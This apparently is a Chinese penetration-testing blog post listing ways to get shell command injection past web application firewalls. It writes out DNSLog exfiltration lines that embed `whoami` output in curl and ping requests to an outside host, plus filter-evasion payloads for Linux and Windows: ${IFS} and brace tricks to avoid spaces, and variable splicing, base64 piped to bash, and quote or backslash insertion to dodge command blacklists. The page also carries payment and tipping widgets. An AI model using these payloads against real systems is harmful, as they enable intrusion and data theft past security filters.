渗透测试中waf命令执行的绕过经验技巧

本文介绍了Linux和Windows命令行中的一些高级技巧,包括管道符、逻辑运算符、重定向、环境变量的使用,以及如何绕过空格限制和命令黑名单。示例展示了如何利用这些技巧执行命令和进行文件操作。同时,还提到了单引号、双引号和反引号在命令行中的特殊含义。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

管道符

;顺序执行,命令之间没有逻辑关系正常顺序执行
&&逻辑与; 当命令1正确执行后,才会执行命令2。否则命令2不会执行两个命令都会执行
||逻辑或; 当命令1不正确执行后,命令2才会执行。否则命令2不会执行mi会执行whom
其他特殊符号
符号作用
单引号,在单引号中所有的特殊符号,如“$”和“`”(反引号)都无特殊含义
"双引号,在双引号中特殊符号都无特殊含义,但“$”、“`”(反引号)和“\”是例外,拥有“调用变量值”,“引用命令”和“转义符”的特殊含义
`反引号:反引号括起来的内容是系统命令,在Bash中先会执行它和()
$()和反引号作用相同,用来引用系统命令
#在shell脚本中,#开头的行代表注释
$用于调用变量的值,如需要调用变量name的值时,需要用$name的方式得到
\转义符,跟在\之后的特殊字符将失去特殊含义,变为普通字符

DNSLog带命令

Linux:
curl http://`whoami`.uvlmxy.dnslog.cn
ping `whoami`.uvlmxy.dnslog.cn

Windows:
ping %USERNAME%.uvlmxy.dnslog.cn
绕过空格限制

${IFS}

root@mon-one:~/tmp/tmp# cat tmp
one
hh
nihao
root@mon-one:~/tmp/tmp# cat${IFS}tmp
one
hh
nihao

重定向符<>

root@mon-one:~/tmp/tmp# cat<>tmp
one
hh
nihao

{,}

root@mon-one:~/tmp/tmp# {cat,tmp}
one
hh
nihao

使用环境变量

COMMAND=$'\x20-al';ls$COMMAND

绕过命令黑名单

拼接

root@mon-one:~/tmp/tmp# cat tmp
one
hh
nihao
root@mon-one:~/tmp/tmp# a=ca;b=t;c=tmp;$a$b $c
one
hh
nihao

base64编码

root@mon-one:~/tmp/tmp# `echo "Y2F0IHRtcA=="|base64 -d`
one
hh
nihao
root@mon-one:~/tmp/tmp# echo "Y2F0IHRtcA=="|base64 -d|bash
one
hh
nihao

单引号/双引号

root@mon-one:~/tmp/tmp# ca''t tm""p
one
hh
nihao

*反斜线*

root@mon-one:~/tmp/tmp# c\at tmp
one
hh
nihao

$@绕过

who$@ami

如果觉得有用,感谢师傅给个赞支持下

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值